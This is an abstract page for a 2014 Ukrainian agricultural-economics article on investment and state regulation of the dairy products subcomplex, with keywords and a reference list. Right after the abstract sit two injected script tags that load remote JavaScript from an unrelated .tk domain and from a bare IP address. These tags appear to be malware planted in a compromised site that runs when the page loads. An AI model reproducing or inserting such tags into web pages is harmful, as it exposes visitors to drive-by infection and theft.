ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.432
Фінансові відносини та бухгалтерський облік

Інвестиційні орієнтири системоутворення у державному регулюванні розвитку молокопродуктового підкомплексу / Слатвінська Л. А. // Економіка АПК. - 2014. - № 3 - С. 50

Встановлено роль продовольчої безпеки в еволюції сучасної цивілізації. Досліджено значення молока у харчуванні людини та молокопродуктового підкомплексу в реалізації завдань продовольчої безпеки держави - збільшення виробництва молока в Україні в 1,4 раза до 2015 року. Визначено вплив інвестицій на розвиток виробничої підсистеми молокопродуктового підкомплексу та міждисциплінарну специфіку процесу інвестування, зумовлену змінами у сферах науки, інновацій, інформаційних технологій та стандартів. Доведено об’єктивну необхідність прискореного і всебічного удосконалення державного регулювання молокопродуктового підкомплексу на основі чіткої інвестиційної його орієнтованості з урахуванням чинних вимог територіальної та галузевої політики держави, а також стандартів найвищого рівня. Рис.: 3. Бібліогр.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інвестиції, система, державне регулювання, продовольча безпека, аграрний сектор, молокопродуктовий підкомплекс, стандарти

Список використаних джерел

 1. Declaration of the World Summit on Food Security – FAO.org (Rome, 2009) [Электронный ресурс] Режим доступа: http://www.fao.org/fileadmin/templates/wsfs/Summit/Docs/Final_Declaration/K6050_Rev10__WSFS_OEWG__ru.pdf.
 2. Technology [Электронный ресурс] Режим доступа: http://www.fao.org/fileadmin/templates/wsfs/Summit/WSFS _Issues_papers/Issues_papers_RU/WSFS_tech_R_LR.pdf.
 3. Milk and dairy products in human nutrition / Food and agriculture organization of the United Nation. – Rome, 2013. – 404 p.
 4. The state of food and agriculture: food systems for better nutrition / Food and agriculture organization of the United Nation. – Rome, 2013. – 114 p.
 5. Investment [Электронный ресурс] Режим доступа: http://www.fao.org/fileadmin/templates/wsfs/Summit/WSFS_ Issues_papers/Issues_papers_RU/WSFS_investment_R_LR.pdf.
 6. Про прийняття Статуту Продовольчої та сільськогосподарської організації Організації Об'єднаних Націй. Закон України № 1334 від 25 листопада 2003 р. // Відом. Верхов. Ради України (ВВР). – 2004. – № 15. – Ст. 211.
 7. Глобалізація і продовольство: моногр. / П.Т. Саблук, О.Г. Білорус, В.І. Власов. – К.: ННЦ ІАЕ, 2008. – 632 с.
 8. Ільчук М.М. Ефективне функціонування молокопродуктового підкомплексу України / М. М. Ільчук. – К.: Нічлава, 2004. – 312 с.
 9. Мостенська Т. Л. Системне забезпечення конкурентоспроможності підприємств м’ясної і молочної промисловості України : моногр. / Т.Л. Мостенська, О.І. Драган, І.В. Суха // Нац. ун-т харч. технологій. – К. : [б. в.], 2010. – 268 с.
 10. Калинчик Н.В. Оптимизация размеров сельскохозяйственных предприятий по производству молока и говядины: моногр. / Н.В. Калинчик, А.А. Петрыченко. – К.: ННЦ ИАЭ, 2011. – 208 с.
 11. Козак О.А. Формування та розвиток ринку молока та молочної продукції в регіоні (на матеріалах Вінницької області) [текст] : автореф. дис... канд. екон. наук: 08.07.02 / О.А. Козак. – К., 2006. – 22 с.
 12. Мудрак Р.П. Формування ринку молока та молокопродуктів у Черкаській області [текст] : автореф. дис... канд. екон. наук: 08.07.02 / Р.П. Мудрак. – Миколаїв, 2002. – 20 с.
 13. Одінцов М. М. Організаційно-економічний механізм формування і розвитку ринку продуктів тваринництва [текст] : автореф. дис... докт. екон. наук: 08.00.03 / М. М. Одінцов. – К., 2010. – 38 с.
 14. Кісіль М.І. Стратегічні напрями інвестиційного забезпечення розвитку сільського господарства / М.І. Кісіль // Економіка АПК. – 2012. – № 9. – С. 36-39.
 15. Кісіль М.І. Інвестиційний проект створення сучасної молочної ферми на 300 корів / М.І. Кісіль, М.М. Кропивко, І.Г. Карпенко; за ред. М.І. Кісіля. – К.: ННЦ ІАЕ, 2012. – 52 с.
 16. Стратегічні напрями реформування управління комплексним розвитком агропромислового виробництва і сільських територій: наук. вид / М.Ф. Кропивко, М.Й. Малік та ін. ; за ред. М.Ф.Кропивка. – К.: ННЦ ІАЕ, 2012. – 82 с.
 17. Підвищення конкурентоспроможності та соціальної спрямованості агропромислового виробництва на основі розвитку кластерних систем: наук. вид. / М.Ф. Кропивко, Ю.О. Лупенко, М.Й. Малік та ін.; за ред. М.Ф. Кропивка. – К.: ННЦ ІАЕ, 2013. – 46 с.
 18. Корецький М.Х. Формування та розвиток системи державного регулювання аграрного сектора економіки [текст]: автореф. дис. ... докт. наук з держ. управління : 25.00.02 / М. Х. Корецький. – К., 2003. – 38 с.
 19. Могильний О.М. Організаційно-економічний механізм державного регулювання аграрного виробництва у трансформаційний період [текст]: автореф. дис... докт. екон. наук: 08.07.02 / О. М. Могильний. – К., 2003. – 40 с.
 20. Діброва А.Д. Державне регулювання сільськогосподарського виробництва [текст] : автореф. дис. … докт. екон. наук: 08.00.03 / А. Д. Діброва. – К., 2008. – 40 с.
Читати статтю: 14_03_50-54.pdf
Читати переклад статті: 1403slatvinska.pdf